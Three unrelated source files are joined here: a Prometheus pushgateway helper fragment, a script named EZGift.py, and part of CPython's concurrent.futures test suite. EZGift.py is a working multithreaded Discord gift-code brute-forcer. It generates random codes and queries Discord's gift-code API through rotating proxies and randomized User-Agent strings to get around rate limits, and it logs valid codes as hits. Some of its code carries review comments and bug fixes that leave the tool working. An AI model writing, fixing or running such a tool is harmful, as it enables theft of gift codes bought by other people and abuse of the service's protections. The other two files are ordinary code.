    _use_gateway('DELETE', gateway, job, None, grouping_key, timeout, handler)
def _use_gateway(method, gateway, job, registry, grouping_key, timeout, handler):
    """Build the pushgateway URL and invoke *handler* with the request parts."""
    parsed = urlparse(gateway)
    if not parsed.scheme or (PYTHON26_OR_OLDER and parsed.scheme not in ['http', 'https']):
        gateway = 'http://{0}'.format(gateway)
    url = '{0}/metrics/job/{1}'.format(gateway, quote_plus(job))

    # DELETE sends no body; otherwise serialize the registry.
    data = b'' if method == 'DELETE' else generate_latest(registry)

    if grouping_key is None:
        grouping_key = {}
    url += ''.join(
        '/{0}/{1}'.format(quote_plus(str(k)), quote_plus(str(v)))
        for k, v in sorted(grouping_key.items()))

    handler(url=url, method=method, timeout=timeout,
            headers=[('Content-Type', CONTENT_TYPE_LATEST)], data=data)()
def instance_ip_grouping_key():
    '''Grouping key with instance set to the IP Address of this host.'''
    # Connecting a UDP socket sends no traffic but makes the kernel choose
    # an outgoing interface, whose address we then read back.
    with closing(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) as sock:
        sock.connect(('localhost', 0))
        return {'instance': sock.getsockname()[0]}
|
EZGift.py | from requests.exceptions import ProxyError, SSLError, ConnectionError, InvalidProxyURL, ChunkedEncodingError
import multiprocessing
from colorama import Fore, Style
from threading import Thread
import fake_useragent
import platform
import requests
import random
import string
import json
import time
import re
import os
from datetime import date
import webbrowser
import sys
# Mutable checker state shared across the worker threads.
cpm = 0  # checks per minute, recomputed by cpmrunner()
total = 0  # total codes processed
valid = 0  # codes that hit
invalid = 0  # codes that missed
today = date.today()
# NOTE(review): this name is shadowed later by the proxies() function below.
proxies = "proxy.txt"
timeout = 3  # per-request timeout in seconds
config = False  # when False, debug() suppresses error/rate-limit output
runmain = 0
def cpmrunner():
    """Continuously recompute the global checks-per-minute (cpm) counter.

    Samples the number of processed codes, sleeps for a fixed interval,
    then extrapolates the delta to a per-minute rate. Runs forever; meant
    to be started on a background thread.
    """
    global valid
    global invalid
    global cpm
    interval = 3  # seconds between samples
    while True:
        before = valid + invalid
        time.sleep(interval)
        after = invalid + valid
        # Extrapolate the interval delta to one minute. The original
        # multiplied a 3-second delta by 60, overstating CPM threefold;
        # 60 // interval (= 20) gives the true per-minute rate.
        cpm = (after - before) * (60 // interval)
# One-time filesystem setup: ensure the proxy list file and the results
# directory exist before any thread touches them.
if not os.path.isfile("proxy.txt"):
    with open("proxy.txt", "w") as fp:
        pass
if not os.path.exists("Results"):
    os.makedirs("Results")
def clear():
    """Clear the console and resize the window (Windows cls / ANSI reset)."""
    for command in ("cls" if os.name == "nt" else "echo -e \\\\033c",
                    "mode con: cols=105 lines=30"):
        os.system(command)
def clear2():
    """Clear the screen, then redraw the banner and the frame header line."""
    os.system("cls" if os.name == "nt" else "echo -e \\\\033c")
    logo()
    frame = "{} ╔══════════════════════════════════════════════════════════════════╗{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX)
    for line in (" ", " ", frame, " "):
        print(line)
def logo():
    """Print the colored ASCII banner; exit cleanly on Ctrl-C."""
    try:
        print(Fore.LIGHTBLUE_EX)
        banner = f"""
███████╗███████╗ ██████╗ ██╗███████╗████████╗
██╔════╝╚══███╔╝██╔════╝ ██║██╔════╝╚══██╔══╝
█████╗ ███╔╝ ██║ ███╗██║█████╗ ██║
██╔══╝ ███╔╝ ██║ ██║██║██╔══╝ ██║
███████╗███████╗╚██████╔╝██║██║ ██║
╚══════╝╚══════╝ ╚═════╝ ╚═╝╚═╝ ╚═╝\n
"""
        # Printing the whole string at once is equivalent to the original
        # character-by-character loop.
        print(banner, end="")
        print(Fore.RESET + "\t\t\t Follow Me on Youtube: Dr. Teilaw")
    except KeyboardInterrupt:
        sys.exit()
# Module-level setup: script directory, randomized User-Agent source, and
# the proxy list loaded once at import time.
path, _ = os.path.split(__file__)
ua = fake_useragent.UserAgent()
# NOTE(review): the handle is never closed; the lines live on in proxy_text.
proxy_file = open("proxy.txt", "r")
proxy_text = proxy_file.readlines()
not_checked = []  # codes that errored out and were never fully checked
def headers():
    """Build HTTP request headers with a freshly randomized User-Agent."""
    return {
        "User-Agent" : ua.random,
        "content-type":"application/json",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Connection": "keep-alive",
    }
def process():
    """Print the 'process running' banner and the results table header."""
    print(Fore.LIGHTMAGENTA_EX + " ║" + Fore.RESET)
    print(Fore.LIGHTMAGENTA_EX + " ║" + Fore.LIGHTBLUE_EX + " [+]" + Fore.LIGHTGREEN_EX + " Process Running Successfully... \n" + Fore.RESET)
    print(Fore.LIGHTMAGENTA_EX + " ║" + Fore.RESET)
    # Column header line: GiftCode | Results | Proxies
    print(Fore.LIGHTMAGENTA_EX + " ╚════════════════" + Fore.LIGHTYELLOW_EX + " GiftCode " + Fore.LIGHTMAGENTA_EX + "══════" + Fore.LIGHTBLUE_EX + " Results " + Fore.LIGHTMAGENTA_EX + "════════"+ Fore.LIGHTYELLOW_EX + " Proxies " + Fore.LIGHTMAGENTA_EX + "════════╝" + Fore.RESET)
    print(" ")
def proxies():
    """Pick a random line from proxy.txt and return a requests-style
    proxy mapping with 'http' and 'https' keys.

    Bug fix: the original left `proxy` unbound when the line already
    carried an http(s):// scheme (the branch was `pass`), raising
    UnboundLocalError on return. Such lines are now used as-is for both
    schemes.
    """
    line = random.choice(proxy_text)
    ip = line.replace("\n", "")
    if str(ip).startswith("http"):
        # Entry already has a scheme: use it unchanged for both protocols.
        proxy = {
            "https": ip,
            "http": ip
        }
    else:
        proxy = {
            "https": "https://" + ip,
            "http": "http://" + ip
        }
    return proxy
def code():
    """Return the next gift code: taken from the user-supplied list when
    option 2 is active (random when exhausted), otherwise random."""
    if option == 2:
        try:
            chosen = random.choice(codes)
            codes.remove(chosen)
            return chosen.replace("\n", "")
        except IndexError:
            pass
    return ("").join(random.choices(string.ascii_letters + string.digits, k=16))
def debug(code, text, proxy, show):
    """Record the outcome of one code check: update counters, persist hits
    and misses to the Results files, and print a colored status line.

    `show` classifies the event; "error"/"message" marks the code as not
    fully checked.
    """
    global cpm
    global total
    global invalid
    global valid
    global config
    try:
        # Extract host:port from the http proxy URL for display.
        line = Fore.LIGHTYELLOW_EX + proxy["http"].split("//")[1]
        host = str(line.split(":")[0])
        port = str(line.split(":")[1])
    except:
        # Malformed proxy entry: nothing sensible to report.
        return
    if show.lower() == "error" or show.lower() == "message":
        not_checked.append(code)
        if config == False:
            # config False suppresses printing of errors/rate-limit messages.
            return
    text = Fore.LIGHTYELLOW_EX + text + Fore.RESET
    if "Invalid" in text:
        text = Fore.RED + " " + text
        total = total + 1
        invalid = invalid +1
        with open("Results/Bad.txt", "a+") as (f):
            f.writelines(code + " | BAD | " + str(today) + "\n")
    elif "Valided" in text:
        # NOTE(review): run_checker() passes "Valid", which matches neither
        # "Invalid" nor "Valided", so this branch looks unreachable and hits
        # appear to be persisted only via save() in run_checker -- confirm.
        text = Fore.GREEN + " " + text
        total = total + 1
        valid = valid + 1
        with open("Results/Hits.txt", "a+") as (f):
            f.writelines(code + " | HIT | " + str(today) + "\n")
    line = Fore.LIGHTYELLOW_EX + proxy["http"].split("//")[1] + Fore.RESET
    code = Fore.LIGHTYELLOW_EX + code + Fore.RESET
    # NOTE(review): this local shadows the module-level logo() function.
    logo = str(Fore.LIGHTMAGENTA_EX + "> [Checker] - " + Fore.RESET)
    os.system("title " + " Discord Gift Checker by Teilaw - Checking [{}] - Hits: {} - Bad: {} - CPM [{}]".format(total, valid, invalid, cpm))
    print("{0:16} {1:26} {2:18} {3:22}".format(logo, code, text, line))
def run_checker(code, headers, proxy):
    """Check one gift code against the Discord API through *proxy*.

    Runs in its own thread; increments the global ``running`` counter while
    active and reports the outcome via :func:`debug`.
    """
    try:
        global running
        running += 1
    except NameError:
        # First thread to run before __main__ set the counter: count ourselves.
        # (Original set it to 0 here, losing this thread from the tally.)
        running = 1
    s = requests.session()
    s.proxies = proxy
    url = "https://discordapp.com/api/v6/entitlements/gift-codes/{}?with_application=false&with_subscription_plan=true".format(code)
    try:
        rr = s.get(url, headers=headers, timeout=timeout)
        if "subscription_plan".lower() in (rr.text).lower():
            # A real gift: persist it and stop this worker thread.
            save(code)
            debug(code, "Valid", proxy, "Valid")
            running -= 1
            sys.exit()
        o = json.loads(rr.text)
        message = o["message"].lower()
        if message == "Unknown Gift Code".lower():
            debug(code, "Invalid", proxy, "Invalid")
        elif message == "You are being rate limited.".lower():
            debug(code, "Message", proxy, "Message")
        elif message == "Access denied".lower():
            # BUG FIX: `message` is lower-cased above, so the original
            # comparison against "Access denied" could never match.
            debug(code, "Message", proxy, "Message")
        else:
            print(rr.text)
    except KeyboardInterrupt:
        sys.exit()
    except ProxyError:
        debug(code, " " + "ProxyEr", proxy, "Error")
    except SSLError:
        debug(code, " " + "SSLErro", proxy, "Error")
    except ConnectionError:
        debug(code, " " + "Connect", proxy, "Error")
    except InvalidProxyURL:
        debug(code, " " + "ProxURL", proxy, "Error")
    except requests.exceptions.ReadTimeout:
        debug(code, " " + "Timeout", proxy, "Error")
    except UnicodeError:
        debug(code, " " + "UnError", proxy, "Error")
    except ChunkedEncodingError:
        debug(code, " " + "Encodin", proxy, "Error")
    except json.decoder.JSONDecodeError:
        debug(code, " " + "JDecode", proxy, "Decode")
    running -= 1
    sys.exit()
if __name__ == "__main__":
    # Entry point: draw the menu, spawn the CPM/stats process, then keep a
    # pool of checker threads saturated up to the requested thread count.
    try:
        clear()
        os.system("title " + " Discord Gift Checker by Teilaw ~ Waiting [0/0] - Hits: 0 - Bad: 0")
        logo()
        print(" ")
        print(" ")
        print("{} ╔════ Settings ════════════════════════════════╗{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX))
        print("{} ║{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX))
        print(Fore.LIGHTMAGENTA_EX + " ║" + Fore.LIGHTBLUE_EX + " 1 - " + Fore.RESET + "[AUTO] Generator + Checker")
        print(Fore.LIGHTMAGENTA_EX + " ║" + Fore.LIGHTBLUE_EX + " 2 - " + Fore.RESET + "Exit")
        print("{} ║{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX))
        print("{} ╚══════════════════════════════════════════════╝{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX))
        try:
            option = int(input("\n" + Fore.LIGHTBLUE_EX + " [?] - " + Fore.RESET + "Select Option (" + Fore.LIGHTBLUE_EX + "1" + Fore.RESET + " or " + Fore.LIGHTBLUE_EX + "2" + Fore.RESET + "): "))
        # BUG FIX: the original bare `except` also swallowed Ctrl-C here;
        # only a non-numeric entry should be reported as invalid.
        except ValueError:
            print(Fore.LIGHTBLUE_EX + " [!] - " + Fore.LIGHTRED_EX + "Invalid option.." + Fore.RESET)
            sys.exit()
        if option == 2:
            print(" ")
            print(Fore.LIGHTBLUE_EX + " [!] - " + Fore.LIGHTRED_EX + "Thanks, BYE!" + Fore.RESET)
            time.sleep(2)
            sys.exit()
        print(" ")
        threads = int(input("\n" + Fore.LIGHTBLUE_EX + " [?] - " + Fore.RESET + "How many Threads ?: " + Fore.RESET))
        print(" ")
        print(Fore.LIGHTBLUE_EX + " >" + Fore.LIGHTGREEN_EX + " Starting.. Please Wait" + Fore.RESET)
        time.sleep(2)
        clear2()
        mythreads = []
        pr = multiprocessing.Process(target=process)
        pr.start()
        running = 0
        while True:
            if running <= threads:
                Thread(target=cpmrunner).start()
                x = Thread(target=run_checker, args=(code(), headers(), proxies(),))
                mythreads.append(x)
                x.start()
            else:
                time.sleep(1)
            # BUG FIX: the original iterated `not_checked` while removing from
            # it (skipping every other entry) and generated brand-new codes
            # instead of retrying the codes that actually failed. Iterate a
            # snapshot and resubmit the failed code itself.
            for unchecked_code in list(not_checked):
                x = Thread(target=run_checker, args=(unchecked_code, headers(), proxies(),))
                mythreads.append(x)
                x.start()
                not_checked.remove(unchecked_code)
    except KeyboardInterrupt:
        print(" ")
        print(Fore.LIGHTBLUE_EX + " [!] - " + Fore.LIGHTRED_EX + "Thanks, BYE!" + Fore.RESET)
        time.sleep(2)
        sys.exit()
    except FileNotFoundError:
        print(" ")
        print(Fore.LIGHTBLUE_EX + " [!] - " + Fore.LIGHTRED_EX + "Invalid File Path" + Fore.RESET)
        sys.exit()
test_concurrent_futures.py | from test import support
from test.support import import_helper
from test.support import threading_helper
# Skip tests if _multiprocessing wasn't built.
import_helper.import_module('_multiprocessing')
from test.support import hashlib_helper
from test.support.script_helper import assert_python_ok
import contextlib
import itertools
import logging
from logging.handlers import QueueHandler
import os
import queue
import sys
import threading
import time
import unittest
import weakref
from pickle import PicklingError
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future,
BrokenExecutor)
from concurrent.futures.process import BrokenProcessPool, _check_system_limits
import multiprocessing.process
import multiprocessing.util
import multiprocessing as mp
if support.check_sanitizer(address=True, memory=True):
    # bpo-46633: Skip the test because it is too slow when Python is built
    # with ASAN/MSAN: between 5 and 20 minutes on GitHub Actions.
    # NOTE: raising SkipTest at import time skips this whole module.
    raise unittest.SkipTest("test too slow on ASAN/MSAN build")
def create_future(state=PENDING, exception=None, result=None):
    """Build a Future whose internal state is forced to the given values."""
    fut = Future()
    fut._state = state
    fut._exception = exception
    fut._result = result
    return fut
# Pre-built futures, one per lifecycle state, shared by the tests below.
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
# Module-global flag mutated by init() so tests can observe worker initializers.
INITIALIZER_STATUS = 'uninitialized'
def mul(x, y):
    """Return the product of *x* and *y* (simple picklable work item)."""
    return y * x
def capture(*args, **kwargs):
    """Echo back the received positional and keyword arguments as a pair."""
    return (args, kwargs)
def sleep_and_raise(t):
    """Sleep for *t* seconds and then fail with a generic Exception."""
    time.sleep(t)
    raise Exception('this is an exception')
def sleep_and_print(t, msg):
    """Sleep *t* seconds, print *msg*, and flush stdout immediately."""
    time.sleep(t)
    print(msg)
    sys.stdout.flush()
def init(x):
    """Worker initializer: record *x* in the module-global status flag."""
    global INITIALIZER_STATUS
    INITIALIZER_STATUS = x
def get_init_status():
    """Return the value last stored by init() (submitted into workers)."""
    return INITIALIZER_STATUS
def init_fail(log_queue=None):
    """Worker initializer that always fails.

    When *log_queue* is given, the 'concurrent.futures' logger is routed
    into it so a child process's critical output can be inspected later.
    """
    if log_queue is not None:
        cf_logger = logging.getLogger('concurrent.futures')
        cf_logger.addHandler(QueueHandler(log_queue))
        cf_logger.setLevel('CRITICAL')
        cf_logger.propagate = False
    time.sleep(0.1)  # let some futures be scheduled
    raise ValueError('error in initializer')
class MyObject(object):
    """Trivial object whose bound method can be submitted to an executor."""

    def my_method(self):
        """Do nothing; exists only so a bound method can be scheduled."""
        pass
class EventfulGCObj():
    """Object that signals a manager-owned Event when garbage collected."""

    def __init__(self, mgr):
        # The event comes from *mgr* so a worker process can also set it.
        self.event = mgr.Event()

    def __del__(self):
        self.event.set()
def make_dummy_object(_):
    """Map helper: ignore the argument and return a fresh MyObject."""
    return MyObject()
class BaseTestCase(unittest.TestCase):
    """Common base: snapshot live threads before each test and verify
    afterwards that no threads or child processes were leaked."""
    def setUp(self):
        self._thread_key = threading_helper.threading_setup()
    def tearDown(self):
        support.reap_children()
        threading_helper.threading_cleanup(*self._thread_key)
class ExecutorMixin:
    """Create/dispose ``self.executor`` around each test and time the run."""
    worker_count = 5
    executor_kwargs = {}

    def setUp(self):
        super().setUp()
        self.t1 = time.monotonic()
        # Process-pool flavours define `ctx`; thread pools take no context.
        kwargs = dict(self.executor_kwargs)
        if hasattr(self, "ctx"):
            kwargs["mp_context"] = self.get_context()
        self.executor = self.executor_type(
            max_workers=self.worker_count, **kwargs)

    def tearDown(self):
        self.executor.shutdown(wait=True)
        self.executor = None
        elapsed = time.monotonic() - self.t1
        if support.verbose:
            print("%.2fs" % elapsed, end=' ')
        self.assertLess(elapsed, 300, "synchronization issue: test lasted too long")
        super().tearDown()

    def get_context(self):
        """Return the multiprocessing context named by ``self.ctx``."""
        return mp.get_context(self.ctx)
class ThreadPoolMixin(ExecutorMixin):
    """Run the mixed-in tests against ThreadPoolExecutor."""
    executor_type = futures.ThreadPoolExecutor
class ProcessPoolForkMixin(ExecutorMixin):
    """Run the mixed-in tests against a fork-context ProcessPoolExecutor."""
    executor_type = futures.ProcessPoolExecutor
    ctx = "fork"
    def get_context(self):
        # Skip when process pools are unsupported or fork is unavailable.
        try:
            _check_system_limits()
        except NotImplementedError:
            self.skipTest("ProcessPoolExecutor unavailable on this system")
        if sys.platform == "win32":
            self.skipTest("require unix system")
        return super().get_context()
class ProcessPoolSpawnMixin(ExecutorMixin):
    """Run the mixed-in tests against a spawn-context ProcessPoolExecutor."""
    executor_type = futures.ProcessPoolExecutor
    ctx = "spawn"
    def get_context(self):
        # Spawn works on every platform, so only the system-limit check applies.
        try:
            _check_system_limits()
        except NotImplementedError:
            self.skipTest("ProcessPoolExecutor unavailable on this system")
        return super().get_context()
class ProcessPoolForkserverMixin(ExecutorMixin):
    """Run the mixed-in tests against a forkserver-context ProcessPoolExecutor."""
    executor_type = futures.ProcessPoolExecutor
    ctx = "forkserver"
    def get_context(self):
        # Skip when process pools are unsupported or forkserver is unavailable.
        try:
            _check_system_limits()
        except NotImplementedError:
            self.skipTest("ProcessPoolExecutor unavailable on this system")
        if sys.platform == "win32":
            self.skipTest("require unix system")
        return super().get_context()
def create_executor_tests(mixin, bases=(BaseTestCase,),
                          executor_mixins=(ThreadPoolMixin,
                                           ProcessPoolForkMixin,
                                           ProcessPoolForkserverMixin,
                                           ProcessPoolSpawnMixin)):
    """For each executor mixin, synthesize a TestCase class combining it
    with *mixin* and register the class in this module's globals."""
    def strip_mixin(name):
        # Drop a trailing 'Mixin'/'Tests'/'Test' suffix from a class name.
        for suffix in ('Mixin', 'Tests', 'Test'):
            if name.endswith(suffix):
                return name[:-len(suffix)]
        return name
    for exe in executor_mixins:
        cls_name = "%s%sTest" % (strip_mixin(exe.__name__),
                                 strip_mixin(mixin.__name__))
        globals()[cls_name] = type(cls_name, (mixin, exe) + bases, {})
class InitializerMixin(ExecutorMixin):
    """Check that a successful initializer runs in every worker."""
    worker_count = 2
    def setUp(self):
        global INITIALIZER_STATUS
        INITIALIZER_STATUS = 'uninitialized'
        self.executor_kwargs = dict(initializer=init,
                                    initargs=('initialized',))
        super().setUp()
    def test_initializer(self):
        # FIX: renamed the local from `futures`, which shadowed the
        # `concurrent.futures` module imported at the top of the file.
        futs = [self.executor.submit(get_init_status)
                for _ in range(self.worker_count)]
        for f in futs:
            self.assertEqual(f.result(), 'initialized')
class FailingInitializerMixin(ExecutorMixin):
    """Check that an initializer which raises marks the executor broken."""
    worker_count = 2
    def setUp(self):
        if hasattr(self, "ctx"):
            # Pass a queue to redirect the child's logging output
            self.mp_context = self.get_context()
            self.log_queue = self.mp_context.Queue()
            self.executor_kwargs = dict(initializer=init_fail,
                                        initargs=(self.log_queue,))
        else:
            # In a thread pool, the child shares our logging setup
            # (see _assert_logged())
            self.mp_context = None
            self.log_queue = None
            self.executor_kwargs = dict(initializer=init_fail)
        super().setUp()
    def test_initializer(self):
        with self._assert_logged('ValueError: error in initializer'):
            try:
                future = self.executor.submit(get_init_status)
            except BrokenExecutor:
                # Perhaps the executor is already broken
                pass
            else:
                with self.assertRaises(BrokenExecutor):
                    future.result()
            # At some point, the executor should break
            for _ in support.sleeping_retry(support.SHORT_TIMEOUT,
                                            "executor not broken"):
                if self.executor._broken:
                    break
            # ... and from this point submit() is guaranteed to fail
            with self.assertRaises(BrokenExecutor):
                self.executor.submit(get_init_status)
    @contextlib.contextmanager
    def _assert_logged(self, msg):
        # Assert that *msg* shows up in the executor's CRITICAL log output,
        # read either from the redirected child queue (process pools) or
        # from the in-process logger (thread pools).
        if self.log_queue is not None:
            yield
            output = []
            try:
                while True:
                    output.append(self.log_queue.get_nowait().getMessage())
            except queue.Empty:
                pass
        else:
            with self.assertLogs('concurrent.futures', 'CRITICAL') as cm:
                yield
            output = cm.output
        self.assertTrue(any(msg in line for line in output),
                        output)
# Materialize concrete TestCase classes for the initializer mixins above.
create_executor_tests(InitializerMixin)
create_executor_tests(FailingInitializerMixin)
class ExecutorShutdownTest:
    """Shutdown-behaviour tests shared by thread and process executors."""
    def test_run_after_shutdown(self):
        self.executor.shutdown()
        self.assertRaises(RuntimeError,
                          self.executor.submit,
                          pow, 2, 5)
    def test_interpreter_shutdown(self):
        # Test the atexit hook for shutdown of worker threads and processes
        rc, out, err = assert_python_ok('-c', """if 1:
            from concurrent.futures import {executor_type}
            from time import sleep
            from test.test_concurrent_futures import sleep_and_print
            if __name__ == "__main__":
                context = '{context}'
                if context == "":
                    t = {executor_type}(5)
                else:
                    from multiprocessing import get_context
                    context = get_context(context)
                    t = {executor_type}(5, mp_context=context)
                t.submit(sleep_and_print, 1.0, "apple")
            """.format(executor_type=self.executor_type.__name__,
                       context=getattr(self, "ctx", "")))
        # Errors in atexit hooks don't change the process exit code, check
        # stderr manually.
        self.assertFalse(err)
        self.assertEqual(out.strip(), b"apple")
    def test_submit_after_interpreter_shutdown(self):
        # Test the atexit hook for shutdown of worker threads and processes
        rc, out, err = assert_python_ok('-c', """if 1:
            import atexit
            @atexit.register
            def run_last():
                try:
                    t.submit(id, None)
                except RuntimeError:
                    print("runtime-error")
                    raise
            from concurrent.futures import {executor_type}
            if __name__ == "__main__":
                context = '{context}'
                if not context:
                    t = {executor_type}(5)
                else:
                    from multiprocessing import get_context
                    context = get_context(context)
                    t = {executor_type}(5, mp_context=context)
                t.submit(id, 42).result()
            """.format(executor_type=self.executor_type.__name__,
                       context=getattr(self, "ctx", "")))
        # Errors in atexit hooks don't change the process exit code, check
        # stderr manually.
        self.assertIn("RuntimeError: cannot schedule new futures", err.decode())
        self.assertEqual(out.strip(), b"runtime-error")
    def test_hang_issue12364(self):
        fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
        self.executor.shutdown()
        for f in fs:
            f.result()
    def test_cancel_futures(self):
        assert self.worker_count <= 5, "test needs few workers"
        fs = [self.executor.submit(time.sleep, .1) for _ in range(50)]
        self.executor.shutdown(cancel_futures=True)
        # We can't guarantee the exact number of cancellations, but we can
        # guarantee that *some* were cancelled. With few workers, many of
        # the submitted futures should have been cancelled.
        cancelled = [fut for fut in fs if fut.cancelled()]
        self.assertGreater(len(cancelled), 20)
        # Ensure the other futures were able to finish.
        # Use "not fut.cancelled()" instead of "fut.done()" to include futures
        # that may have been left in a pending state.
        others = [fut for fut in fs if not fut.cancelled()]
        for fut in others:
            self.assertTrue(fut.done(), msg=f"{fut._state=}")
            self.assertIsNone(fut.exception())
        # Similar to the number of cancelled futures, we can't guarantee the
        # exact number that completed. But, we can guarantee that at least
        # one finished.
        self.assertGreater(len(others), 0)
    def test_hang_gh83386(self):
        """shutdown(wait=False) doesn't hang at exit with running futures.

        See https://github.com/python/cpython/issues/83386.
        """
        if self.executor_type == futures.ProcessPoolExecutor:
            raise unittest.SkipTest(
                "Hangs, see https://github.com/python/cpython/issues/83386")
        rc, out, err = assert_python_ok('-c', """if True:
            from concurrent.futures import {executor_type}
            from test.test_concurrent_futures import sleep_and_print
            if __name__ == "__main__":
                if {context!r}: multiprocessing.set_start_method({context!r})
                t = {executor_type}(max_workers=3)
                t.submit(sleep_and_print, 1.0, "apple")
                t.shutdown(wait=False)
            """.format(executor_type=self.executor_type.__name__,
                       context=getattr(self, 'ctx', None)))
        self.assertFalse(err)
        self.assertEqual(out.strip(), b"apple")
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
    """Thread-pool specific shutdown behaviour."""
    def test_threads_terminate(self):
        def acquire_lock(lock):
            lock.acquire()
        sem = threading.Semaphore(0)
        for i in range(3):
            self.executor.submit(acquire_lock, sem)
        self.assertEqual(len(self.executor._threads), 3)
        for i in range(3):
            sem.release()
        self.executor.shutdown()
        for t in self.executor._threads:
            t.join()
    def test_context_manager_shutdown(self):
        with futures.ThreadPoolExecutor(max_workers=5) as e:
            executor = e
            self.assertEqual(list(e.map(abs, range(-5, 5))),
                             [5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
        for t in executor._threads:
            t.join()
    def test_del_shutdown(self):
        executor = futures.ThreadPoolExecutor(max_workers=5)
        res = executor.map(abs, range(-5, 5))
        threads = executor._threads
        del executor
        for t in threads:
            t.join()
        # Make sure the results were all computed before the
        # executor got shutdown.
        # FIX: use a unittest assertion instead of a bare `assert`, which
        # is stripped when running under `python -O`.
        self.assertTrue(all([r == abs(v) for r, v in zip(res, range(-5, 5))]))
    def test_shutdown_no_wait(self):
        # Ensure that the executor cleans up the threads when calling
        # shutdown with wait=False
        executor = futures.ThreadPoolExecutor(max_workers=5)
        res = executor.map(abs, range(-5, 5))
        threads = executor._threads
        executor.shutdown(wait=False)
        for t in threads:
            t.join()
        # Make sure the results were all computed before the
        # executor got shutdown.
        self.assertTrue(all([r == abs(v) for r, v in zip(res, range(-5, 5))]))
    def test_thread_names_assigned(self):
        executor = futures.ThreadPoolExecutor(
            max_workers=5, thread_name_prefix='SpecialPool')
        executor.map(abs, range(-5, 5))
        threads = executor._threads
        del executor
        support.gc_collect()  # For PyPy or other GCs.
        for t in threads:
            self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
            t.join()
    def test_thread_names_default(self):
        executor = futures.ThreadPoolExecutor(max_workers=5)
        executor.map(abs, range(-5, 5))
        threads = executor._threads
        del executor
        support.gc_collect()  # For PyPy or other GCs.
        for t in threads:
            # Ensure that our default name is reasonably sane and unique when
            # no thread_name_prefix was supplied.
            self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
            t.join()
    def test_cancel_futures_wait_false(self):
        # Can only be reliably tested for TPE, since PPE often hangs with
        # `wait=False` (even without *cancel_futures*).
        # FIX: dropped the original's no-op `.format(executor_type=...)`
        # chained onto a script string that has no format placeholders.
        rc, out, err = assert_python_ok('-c', """if True:
            from concurrent.futures import ThreadPoolExecutor
            from test.test_concurrent_futures import sleep_and_print
            if __name__ == "__main__":
                t = ThreadPoolExecutor()
                t.submit(sleep_and_print, .1, "apple")
                t.shutdown(wait=False, cancel_futures=True)
            """)
        # Errors in atexit hooks don't change the process exit code, check
        # stderr manually.
        self.assertFalse(err)
        self.assertEqual(out.strip(), b"apple")
class ProcessPoolShutdownTest(ExecutorShutdownTest):
    """Process-pool specific shutdown behaviour."""
    def test_processes_terminate(self):
        def acquire_lock(lock):
            lock.acquire()
        mp_context = self.get_context()
        if mp_context.get_start_method(allow_none=False) == "fork":
            # fork pre-spawns, not on demand.
            expected_num_processes = self.worker_count
        else:
            expected_num_processes = 3
        sem = mp_context.Semaphore(0)
        for _ in range(3):
            self.executor.submit(acquire_lock, sem)
        self.assertEqual(len(self.executor._processes), expected_num_processes)
        for _ in range(3):
            sem.release()
        processes = self.executor._processes
        self.executor.shutdown()
        for p in processes.values():
            p.join()
    def test_context_manager_shutdown(self):
        with futures.ProcessPoolExecutor(
                max_workers=5, mp_context=self.get_context()) as e:
            processes = e._processes
            self.assertEqual(list(e.map(abs, range(-5, 5))),
                             [5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
        for p in processes.values():
            p.join()
    def test_del_shutdown(self):
        executor = futures.ProcessPoolExecutor(
            max_workers=5, mp_context=self.get_context())
        res = executor.map(abs, range(-5, 5))
        # FIX: the original read _executor_manager_thread twice (duplicated
        # line); grab each resource handle exactly once before `del`.
        executor_manager_thread = executor._executor_manager_thread
        processes = executor._processes
        call_queue = executor._call_queue
        del executor
        support.gc_collect()  # For PyPy or other GCs.
        # Make sure that all the executor resources were properly cleaned by
        # the shutdown process
        executor_manager_thread.join()
        for p in processes.values():
            p.join()
        call_queue.join_thread()
        # Make sure the results were all computed before the
        # executor got shutdown.
        # FIX: unittest assertion instead of a bare `assert` (stripped by -O).
        self.assertTrue(all([r == abs(v) for r, v in zip(res, range(-5, 5))]))
    def test_shutdown_no_wait(self):
        # Ensure that the executor cleans up the processes when calling
        # shutdown with wait=False
        executor = futures.ProcessPoolExecutor(
            max_workers=5, mp_context=self.get_context())
        res = executor.map(abs, range(-5, 5))
        processes = executor._processes
        call_queue = executor._call_queue
        executor_manager_thread = executor._executor_manager_thread
        executor.shutdown(wait=False)
        # Make sure that all the executor resources were properly cleaned by
        # the shutdown process
        executor_manager_thread.join()
        for p in processes.values():
            p.join()
        call_queue.join_thread()
        # Make sure the results were all computed before the executor got
        # shutdown.
        self.assertTrue(all([r == abs(v) for r, v in zip(res, range(-5, 5))]))
# Process-pool shutdown tests run under every start method, not under threads.
create_executor_tests(ProcessPoolShutdownTest,
                      executor_mixins=(ProcessPoolForkMixin,
                                       ProcessPoolForkserverMixin,
                                       ProcessPoolSpawnMixin))
class WaitTests:
    """Tests for futures.wait() shared across executor types."""
    def test_20369(self):
        # See https://bugs.python.org/issue20369
        future = self.executor.submit(time.sleep, 1.5)
        done, not_done = futures.wait([future, future],
                            return_when=futures.ALL_COMPLETED)
        self.assertEqual({future}, done)
        self.assertEqual(set(), not_done)
    def test_first_completed(self):
        future1 = self.executor.submit(mul, 21, 2)
        future2 = self.executor.submit(time.sleep, 1.5)
        done, not_done = futures.wait(
                [CANCELLED_FUTURE, future1, future2],
